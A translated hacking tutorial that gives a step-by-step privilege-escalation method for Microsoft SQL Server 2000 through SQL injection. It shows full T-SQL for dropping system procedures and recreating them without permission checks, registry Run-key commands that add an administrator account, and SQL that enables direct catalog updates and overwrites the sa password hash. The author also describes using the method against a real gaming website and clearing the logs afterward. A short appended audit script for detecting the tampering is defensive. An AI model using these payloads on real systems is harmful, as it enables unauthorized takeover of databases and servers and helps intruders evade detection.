SQL Injection Universal Privilege Escalation Method

xiaoxiao, 2021-03-06

---- Give me one injection point, whatever its permissions, and I will give you a Webshell or even system privileges.

Statement: this article is for teaching purposes only; the author takes no responsibility for the consequences of any attack based on it. Because it is so harmful, the original text has been cut down and modified; even so it remains dangerous, so please do not carry out any destructive operations against domestic sites. After much hesitation I decided to publish it anyway. The technique has a very wide range of use: as long as a website has a SQL injection vulnerability, this method will get a Webshell or even system privileges in 99% of cases (I dare not say 100%, but in hundreds of real "practical exercises" it has worked essentially every time).

I remember writing, in "MSSQL DB_OWNER Role Injection Directions (Continued)", about using xp_regwrite to obtain system privileges:

    xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'xwq1', 'REG_SZ', 'net user xwq xwq /add'
    xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'xwq2', 'REG_SZ', 'net localgroup administrators xwq /add'

As long as the server hosting the site is restarted, you get system privileges. After hundreds of real experiments, though, this method is not practical: it easily attracts the administrator's attention, and forcing a restart with DDoS is illegal (even for a good person) and costs a lot of manpower and resources (it depends on how many zombie machines, "broilers", you have). So it is not feasible, unless you want the box very badly. Enough preamble; you may already be impatient, so here is one of my three "must-kill" techniques --- universal privilege escalation.

Suppose a website has a SQL injection vulnerability and connects to the database as a member of the sysadmin fixed server role (in plain terms, SA, as newcomers tend to think of it). Getting a Webshell or system privileges from there is trivial; as far as I know there are at least ten ways to do it from sysadmin, possibly more, and I will not go over them since everyone here knows them better than I do. But what if the website's account only has db_owner? How do you get system privileges or a Webshell then (assuming no upload vulnerability and no database backup trick)? Most people would answer "back up a shell", but as LCX pointed out in "MSSQL DB_OWNER Role Injection to System Privileges", a backed-up shell is only theoretical: if the Webshell is 20 MB, can you still use it? So what would you think if I told you that there are more ways to get a Webshell or system privileges from db_owner than from sysadmin? Incredible, or am I just talking? (If you don't believe me, stop reading here.) Fine, I will stop teasing and tell everyone my third major killing technique --- the universal privilege escalation method.

First the experimental environment: Windows XP SP1 with SQL Server 2000 SP3. Follow along step by step. Create a user with only db_owner; mine is xwq (select nothing under server roles, tick db_owner under database roles). Open Query Analyzer as xwq, enter sp_addlogin xuwenqiang and execute it. What comes back?

    Server: Msg 2571, Level 14, State 2, Procedure sp_addlogin, Line 16
    User 'xwq' does not have permission to run DBCC auditevent.
    Server: Msg 15247, Level 16, State 1, Procedure sp_addlogin, Line 17
    User does not have permission to perform this action.

The error above is normal, because only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin. So how can we run sp_addlogin anyway? Let's look at the source of sp_addlogin:

    create procedure sp_addlogin
        @loginame    sysname,
        @passwd      sysname = Null,
        @defdb       sysname = 'master',     -- UNDONE: DEFAULT CONFIGURABLE???
        @deflanguage sysname = Null,
        @sid         varbinary(16) = Null,
        @encryptopt  varchar(20) = Null
    as
        -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
        set nocount on
        declare @ret int   -- return value of sp call

        -- CHECK PERMISSIONS --
        IF (not is_srvrolemember('securityadmin') = 1)
        begin
            dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
            raiserror(15247,-1,-1)
            return (1)
        end
        else
        begin
            dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
        end

        -- DISALLOW USER TRANSACTION --
        set implicit_transactions off
        IF (@@trancount > 0)
        begin
            raiserror(15002,-1,-1,'sp_addlogin')
            return (1)
        end

        -- VALIDATE LOGIN NAME AS:
        --  (1) Valid SQL Name (SQL Login)
        --  (2) No backslash
        --  (3) Not a reserved login name
        execute @ret = sp_validname @loginame
        if (@ret <> 0)
            return (1)
        IF (charindex('\', @loginame) > 0)
        begin
            raiserror(15006,-1,-1,@loginame)
            return (1)
        end
        -- NOTE: DIFFERENT CASE SA IS ALLOWED.
        IF (@loginame = 'sa' or lower(@loginame) in ('public'))
        begin
            raiserror(15405,-1,-1,@loginame)
            return (1)
        end

        -- LOGIN NAME MUST NOT ALREADY EXIST --
        IF exists (select * from master.dbo.syslogins where loginname = @loginame)
        begin
            raiserror(15025,-1,-1,@loginame)
            return (1)
        end

        -- VALIDATE DEFAULT DATABASE --
        IF db_id(@defdb) IS NULL
        begin
            raiserror(15010,-1,-1,@defdb)
            return (1)
        end

        -- VALIDATE DEFAULT LANGUAGE --
        IF (@deflanguage IS NOT Null)
        begin
            execute @ret = sp_validlang @deflanguage
            if (@ret <> 0)
                return (1)
        end
        ELSE
        begin
            select @deflanguage = name from master.dbo.syslanguages
                where langid = @@default_langid   -- server default language
            if @deflanguage is null
                select @deflanguage = N'us_english'
        end

        -- VALIDATE SID IF GIVEN --
        if ((@sid IS NOT Null) and (datalength(@sid) <> 16))
        begin
            raiserror(15419,-1,-1)
            return (1)
        end
        else if @sid is null
            select @sid = newid()
        IF (suser_sname(@sid) IS NOT NULL)
        begin
            raiserror(15433,-1,-1)
            return (1)
        end

        -- VALIDATE AND USE ENCRYPTION OPTION --
        declare @xstatus smallint
        select @xstatus = 2   -- access
        if @encryptopt is null
            select @passwd = pwdencrypt(@passwd)
        else if @encryptopt = 'skip_encryption_old'
        begin
            select @xstatus = @xstatus | 0x800,   -- old-style encryption
                   @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
        end
        else if @encryptopt <> 'skip_encryption'
        begin
            raiserror(15600,-1,-1,'sp_addlogin')
            return 1
        end

        -- ATTEMPT THE INSERT OF THE NEW LOGIN --
        insert into master.dbo.sysxlogins values
            (NULL, @sid, @xstatus, getdate(), getdate(), @loginame,
             convert(varbinary(256), @passwd), db_id(@defdb), @deflanguage)
        if @@error <> 0   -- this indicates we saw a duplicate row
            return (1)

        -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
        exec('use master grant all to null')

        -- FINALIZATION: RETURN SUCCESS/FAILURE --
        raiserror(15298,-1,-1)
        return (0)   -- sp_addlogin
    GO

Only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin, and the place to play tricks is this part:

    -- CHECK PERMISSIONS --
    IF (not is_srvrolemember('securityadmin') = 1)
    begin
        dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
        raiserror(15247,-1,-1)
        return (1)
    end
    else
    begin
        dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
    end

Once this code is cut out, any permission level can add a login.

Well, first delete it with drop procedure sp_addlogin, then recreate sp_addlogin without the permission check:

    create procedure sp_addlogin
        @loginame    sysname,
        @passwd      sysname = Null,
        @defdb       sysname = 'master',     -- UNDONE: DEFAULT CONFIGURABLE???
        @deflanguage sysname = Null,
        @sid         varbinary(16) = Null,
        @encryptopt  varchar(20) = Null
    as
        -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
        set nocount on
        declare @ret int   -- return value of sp call

        -- DISALLOW USER TRANSACTION --
        set implicit_transactions off
        IF (@@trancount > 0)
        begin
            raiserror(15002,-1,-1,'sp_addlogin')
            return (1)
        end

        -- VALIDATE LOGIN NAME AS:
        --  (1) Valid SQL Name (SQL Login)
        --  (2) No backslash
        --  (3) Not a reserved login name
        execute @ret = sp_validname @loginame
        if (@ret <> 0)
            return (1)
        IF (charindex('\', @loginame) > 0)
        begin
            raiserror(15006,-1,-1,@loginame)
            return (1)
        end
        -- NOTE: DIFFERENT CASE SA IS ALLOWED.
        IF (@loginame = 'sa' or lower(@loginame) in ('public'))
        begin
            raiserror(15405,-1,-1,@loginame)
            return (1)
        end

        -- LOGIN NAME MUST NOT ALREADY EXIST --
        IF exists (select * from master.dbo.syslogins where loginname = @loginame)
        begin
            raiserror(15025,-1,-1,@loginame)
            return (1)
        end

        -- VALIDATE DEFAULT DATABASE --
        IF db_id(@defdb) IS NULL
        begin
            raiserror(15010,-1,-1,@defdb)
            return (1)
        end

        -- VALIDATE DEFAULT LANGUAGE --
        IF (@deflanguage IS NOT Null)
        begin
            execute @ret = sp_validlang @deflanguage
            if (@ret <> 0)
                return (1)
        end
        ELSE
        begin
            select @deflanguage = name from master.dbo.syslanguages
                where langid = @@default_langid   -- server default language
            if @deflanguage is null
                select @deflanguage = N'us_english'
        end

        -- VALIDATE SID IF GIVEN --
        if ((@sid IS NOT Null) and (datalength(@sid) <> 16))
        begin
            raiserror(15419,-1,-1)
            return (1)
        end
        else if @sid is null
            select @sid = newid()
        IF (suser_sname(@sid) IS NOT NULL)
        begin
            raiserror(15433,-1,-1)
            return (1)
        end

        -- VALIDATE AND USE ENCRYPTION OPTION --
        declare @xstatus smallint
        select @xstatus = 2   -- access
        if @encryptopt is null
            select @passwd = pwdencrypt(@passwd)
        else if @encryptopt = 'skip_encryption_old'
        begin
            select @xstatus = @xstatus | 0x800,   -- old-style encryption
                   @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
        end
        else if @encryptopt <> 'skip_encryption'
        begin
            raiserror(15600,-1,-1,'sp_addlogin')
            return 1
        end

        -- ATTEMPT THE INSERT OF THE NEW LOGIN --
        insert into master.dbo.sysxlogins values
            (NULL, @sid, @xstatus, getdate(), getdate(), @loginame,
             convert(varbinary(256), @passwd), db_id(@defdb), @deflanguage)
        if @@error <> 0   -- this indicates we saw a duplicate row
            return (1)

        -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
        exec('use master grant all to null')

        -- FINALIZATION: RETURN SUCCESS/FAILURE --
        raiserror(15298,-1,-1)
        return (0)   -- sp_addlogin
    GO

Now all that is left is to add the user. I enter sp_addlogin xuwenqiang in Query Analyzer and execute it: a new login is created.

I have created the login xuwenqiang, but that is not the end in itself; I want to turn it into the highest authority, which in SQL Server is sysadmin. Only the stored procedure sp_addsrvrolemember turns a login into a sysadmin member, and it too can only be used by sysadmin. Annoying, but we can still make it work for us. Smart readers will already have guessed how: with only db_owner, use the same method as with sp_addlogin. Remove the permission restrictions from sp_addsrvrolemember and we can add sysadmin members at will. Here is the source of sp_addsrvrolemember:

    create procedure sp_addsrvrolemember
        @loginame sysname,          -- login name
        @rolename sysname = NULL    -- server role name
    as
        -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
        set nocount on
        declare @ret int,           -- return value of sp call
                @rolebit smallint,
                @ismem int

        -- DISALLOW USER TRANSACTION --
        set implicit_transactions off
        IF (@@trancount > 0)
        begin
            raiserror(15002,-1,-1,'sp_addsrvrolemember')
            return (1)
        end

        -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
        select @ismem = is_srvrolemember(@rolename)
        if @ismem is null
        begin
            dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
            raiserror(15402,-1,-1,@rolename)
            return (1)
        end
        if @ismem = 0
        begin
            dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
            raiserror(15247,-1,-1)
            return (1)
        end

        -- AUDIT A SUCCESSFUL SECURITY CHECK --
        dbcc auditevent (108, 1, 1, @loginame, NULL, @rolename, NULL)

        -- CANNOT CHANGE SA ROLES --
        IF @loginame = 'sa'
        begin
            raiserror(15405,-1,-1,@loginame)
            return (1)
        end

        -- OBTAIN THE BIT FOR THIS ROLE --
        select @rolebit = CASE @rolename
            WHEN 'sysadmin'      THEN 16
            WHEN 'securityadmin' THEN 32
            WHEN 'serveradmin'   THEN 64
            WHEN 'setupadmin'    THEN 128
            WHEN 'processadmin'  THEN 256
            WHEN 'diskadmin'     THEN 512
            WHEN 'dbcreator'     THEN 1024
            WHEN 'bulkadmin'     THEN 4096
            ELSE NULL END

        -- ADD ROW FOR NT LOGIN IF NEEDED --
        if not exists (select * from master.dbo.syslogins where loginname = @loginame)
        begin
            execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
            if (@ret <> 0)
            begin
                raiserror(15007,-1,-1,@loginame)
                return (1)
            end
        end

        -- UPDATE ROLE MEMBERSHIP --
        update master.dbo.sysxlogins
            set xstatus = xstatus | @rolebit, xdate2 = getdate()
            where name = @loginame and srvid IS NULL

        -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
        exec('use master grant all to null')
        raiserror(15488,-1,-1,@loginame,@rolename)

        -- FINALIZATION: RETURN SUCCESS/FAILURE --
        return (@@error)   -- sp_addsrvrolemember
    GO

Remove this segment:

    -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
    select @ismem = is_srvrolemember(@rolename)
    if @ismem is null
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15402,-1,-1,@rolename)
        return (1)
    end
    if @ismem = 0
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15247,-1,-1)
        return (1)
    end

Now sysadmin members can be added arbitrarily; cool. Enter sp_addsrvrolemember xuwenqiang, sysadmin in Query Analyzer: yeah, success! We have used a login with only db_owner to create a new login, xuwenqiang, holding the highest privilege in SQL Server, sysadmin; from there a Webshell or system privileges are easy. And don't fix your eyes only on the two stored procedures I have discussed; if sysadmin alone were not enough, we could apply my universal escalation to others.

For example sp_configure, sp_addlinkedserver, sp_addlinkedsrvlogin, sp_makewebtask and so on: many procedures restricted to sysadmin can be made to work for us. Let's take, as an example of universal escalation, creating a back door that can never be killed. We all know that SQL Server has a built-in back door called sa: sa is the built-in administrator login, and it can neither be changed nor deleted. That is what M$ says; if you have read another article of mine, "Completely Delete the sa Back Door", you know that sa can be deleted too. We know that sp_password changes a password, but you must know the user's old password to use it. Is there really no way to change sa's password without knowing the old one? There is. sp_configure displays or changes global configuration settings for the current server, and by default execute permission on sp_configure (to change options) is granted to the sysadmin and serveradmin fixed server roles. So simply remove the permission check from sp_configure and rebuild it, and it is ours to use:

    CREATE PROCEDURE sp_configure   --- 1996/08/14 09:43
        @configname  varchar(35) = NULL,   -- option name to configure
        @configvalue int = NULL            -- new configuration value
    as
        set nocount on
        declare @confignum int,        -- number of the option to be configured
                @configcount int,      -- number of options like @configname
                @show_advance int      -- Y/N read & write actions on "advanced" opts
        declare @fullconfigname varchar(35)
        declare @prevvalue int

        /*
        **  Determine @show_advance based on the "show advanced options" entry in syscurconfigs.
        */
        if (select value from master.dbo.syscurconfigs where config = 518) = 1
            select @show_advance = 1   -- display advanced options
        else
            select @show_advance = 0   -- do not display advanced options

        /*
        **  Make certain that max user info. reflects any addpak upgrades.
        */
        if (select high from master.dbo.spt_values where number = 103 and type = 'C') <> @@max_connections
            update master.dbo.spt_values set high = @@max_connections
                where number = 103 and type = 'C'

        /*
        **  If no option name is given, the procedure will just print out all the
        **  options and their values.
        */
        if @configname is NULL
        begin
            select name, minimum = low, maximum = high,
                   config_value = c.value,
                   run_value = master.dbo.syscurconfigs.value
            from master.dbo.spt_values, master.dbo.sysconfigures c, master.dbo.syscurconfigs
            where type = 'C' and number = c.config
              and number = master.dbo.syscurconfigs.config
              and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
            order by lower(name)
            return (0)
        end

        /*
        **  Use @configname and try to find the right option.
        **  If there is not just one, print appropriate diagnostics and return.
        */
        select @configcount = count(*), @fullconfigname = min(v.name), @prevvalue = min(c.value)
        from master.dbo.spt_values v, master.dbo.sysconfigures c
        where v.name like '%' + @configname + '%' and v.type = 'C'
          and v.number = c.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

        /*
        **  If no option, show the user what the options are.
        */
        if @configcount = 0
        begin
            raiserror(15123,-1,-1,@configname)
            print ' '
            raiserror(15456,-1,-1)
            /*
            **  Show the user what the options are.
            */
            select name, minimum = low, maximum = high,
                   config_value = c.value,
                   run_value = master.dbo.syscurconfigs.value
            from master.dbo.spt_values, master.dbo.sysconfigures c, master.dbo.syscurconfigs
            where type = 'C' and number = c.config
              and number = master.dbo.syscurconfigs.config
              and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
            return (1)
        end

        /*
        **  If more than one option like @configname, show the duplicates and return.
        */
        if @configcount > 1
        begin
            raiserror(15124,-1,-1,@configname)
            print ' '
            select duplicate_options = name
            from master.dbo.spt_values, master.dbo.sysconfigures c
            where name like '%' + @configname + '%' and type = 'C'
              and number = c.config
              and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
            return (1)
        end
        else
            /* There must be exactly one, so get the full name */
            select @configname = name   --, @value_in_sysconfigures = c.value
            from master.dbo.spt_values, master.dbo.sysconfigures c
            where name like '%' + @configname + '%' and type = 'C'
              and number = c.config
              and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

        /*
        **  If @configvalue is null, just show the current state of the option.
        */
        if @configvalue is null
        begin
            select v.name, v.low as 'minimum', v.high as 'maximum',
                   c.value as 'config_value', u.value as 'run_value'
            from master.dbo.spt_values v
                 left outer join master.dbo.sysconfigures c on v.number = c.config
                 left outer join master.dbo.syscurconfigs u on v.number = u.config
            where v.type = 'C' and v.name like '%' + @configname + '%'
              and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
            return (0)
        end

        /*
        **  Now get the configuration number.
        */
        select @confignum = number
        from master.dbo.spt_values, master.dbo.sysconfigures c
        where type = 'C' and (@configvalue between low and high or @configvalue = 0)
          and name like '%' + @configname + '%'
          and number = c.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

        /*
        **  If this is the number of default language, we want to make sure
        **  that the new value is a valid language id in syslanguages.
        */
        if @confignum = 124
        begin
            if not exists (select * from master.dbo.syslanguages where langid = @configvalue)
            begin
                /* 0 is default language, us_english */
                if @configvalue <> 0
                begin
                    raiserror(15127,-1,-1)
                    return (1)
                end
            end
        end

        /*
        **  If this is the number of kernel language, we want to make sure
        **  that the new value is a valid language id in syslanguages.
        */
        if @confignum = 132
        begin
            if not exists (select * from master.dbo.syslanguages where langid = @configvalue)
            begin
                /* 0 is default language, us_english */
                if @configvalue <> 0
                begin
                    raiserror(15028,-1,-1)
                    return (1)
                end
            end
        end

        /*
        **  "user options" should not try to set incompatible options/values
        */
        if @confignum = 1534   -- "user options"
        begin
            if (@configvalue & (1024 + 2048)) = (1024 + 2048)   -- ansi_null_default_on/off
            begin
                raiserror(15303,-1,-1,@configvalue)
                return (1)
            end
        end

        /*
        **  Although the @configname is good, no @confignum was found (value out of range).
        */
        if @confignum is NULL
        begin
            raiserror(15129,-1,-1,@configvalue,@configname)
            return (1)
        end

        -- Msg 15002, but in 6.5 allow this inside a txn (not check @@trancount) #12828

        /*
        **  Now update sysconfigures.
        */
        update master.dbo.sysconfigures set value = @configvalue
            where config = @confignum

        /*
        **  Flush the procedure cache - this is to account for options which become
        **  effective immediately (i.e. don't need a server restart).
        */
        dbcc freeproccache

        raiserror(15457,-1,-1,@fullconfigname,@prevvalue,@configvalue) with log

        return (0)   -- sp_configure
    GO

OK, now run:

    sp_configure 'allow updates', 1
    go
    reconfigure with override
    go

With that we can change sa's password directly:

    update sysxlogins set password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid = 0x01

sa's password has now been changed to 111111. The way to defend against this is to delete sa; how to do that is described in my "Completely Delete the sa Back Door".

Example: the following is an attack test I did some time ago against a famous domestic site, as a rough verification of the above. For many reasons I will call the site www.**173.com. It is very well known in gaming, ranking about 20th (at the time of my test). I won't describe how I found the injection point; everyone can still find it. (The whole test really took a lot of time, but don't misunderstand: the time went not into "testing" but into writing the program. Don't write it like the samples; make it do what you want. The actual attack took only 10 minutes.)

At the injection point GameType=** (frustratingly, NBSI2 would have made this easy if I had had it when testing), first enter drop procedure sp_addlogin, then enter in IE (actually I typed it into the program I wrote) the create procedure sp_addlogin statement shown earlier, the version with the CHECK PERMISSIONS block removed. OK, add our new user: exec master..sp_addlogin xwq. Then drop procedure sp_addsrvrolemember, and enter in IE the create procedure sp_addsrvrolemember statement shown earlier, again the version with the VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS segment removed, followed by exec master..sp_addsrvrolemember xwq, sysadmin. Then we take a SQL comprehensive utilization tool, or simply Query Analyzer, and look: success! We have built a login with the highest privileges on the server. The rest I leave to everyone. Because this was only a safety test I did not go any deeper; I deleted the account, cleared the log, and left.
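As an added example that is not part of the original article, here is an audit script a DBA could run as sysadmin on SQL Server 2000 to spot the tampering described above: 'allow updates' switched on, system procedures dropped or rebuilt without their is_srvrolemember() check, and unexpected sysadmin logins. It assumes the SQL Server 2000 master catalog tables sysobjects, syscomments, sysxlogins, sysconfigures and syscurconfigs, and that config id 102 is 'allow updates'.

```sql
-- Added audit script (not from the original article). Run as sysadmin in master
-- on SQL Server 2000; it assumes the 2000-era catalog tables used in the article.
use master
go
set nocount on

-- 1. Is 'allow updates' (config id 102) on?  The article needs it to write
--    sysxlogins directly; on a production server both values should be 0.
select 'allow updates (configured)' as check_name, value
from master.dbo.sysconfigures where config = 102
select 'allow updates (running)' as check_name, value
from master.dbo.syscurconfigs where config = 102

-- 2. Do sp_addlogin and sp_addsrvrolemember still carry their permission
--    check?  Both bodies quoted in the article call is_srvrolemember(); a copy
--    rebuilt without the check will not.  syscomments stores long bodies as
--    several 4000-character rows, so every row of the procedure is searched.
select o.name,
       case when exists (select * from master.dbo.syscomments s
                         where s.id = o.id and s.text like '%is_srvrolemember%')
            then 'permission check present'
            else 'PERMISSION CHECK MISSING - procedure may have been rebuilt'
       end as status,
       o.crdate as created
from master.dbo.sysobjects o
where o.type = 'P' and o.name in ('sp_addlogin', 'sp_addsrvrolemember')

-- 3. Was any of the targeted procedures (re)created later than the rest of the
--    system procedures?  Install and service packs create them together, so a
--    lone recent crdate on sp_configure or the others is suspicious.
select o.name, o.crdate
from master.dbo.sysobjects o
where o.type = 'P'
  and o.name in ('sp_addlogin', 'sp_addsrvrolemember', 'sp_configure',
                 'sp_addlinkedserver', 'sp_addlinkedsrvlogin', 'sp_makewebtask')
  and o.crdate > (select crdate from master.dbo.sysobjects
                  where name = 'sp_helpdb' and type = 'P')

-- 4. Has a targeted procedure been dropped outright?  A missing sp_addlogin in
--    master is the loudest indicator of the first step in the article.
select n.name as missing_proc
from (select 'sp_addlogin' as name
      union all select 'sp_addsrvrolemember'
      union all select 'sp_configure') n
where not exists (select * from master.dbo.sysobjects o
                  where o.name = n.name and o.type = 'P')

-- 5. Which logins hold sysadmin (xstatus bit 16, as in the article's CASE
--    expression), and when were they last modified?  Newest first.
select name, xdate1 as created, xdate2 as modified
from master.dbo.sysxlogins
where srvid is null and (xstatus & 16) = 16
order by xdate2 desc
go
```

If check 2 or 3 flags anything, restore the affected procedures from a clean installation of the same service pack and review who held db_owner or higher on the web application's database.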

Please credit the original when reposting: https://www.9cbs.com/read-47751.html
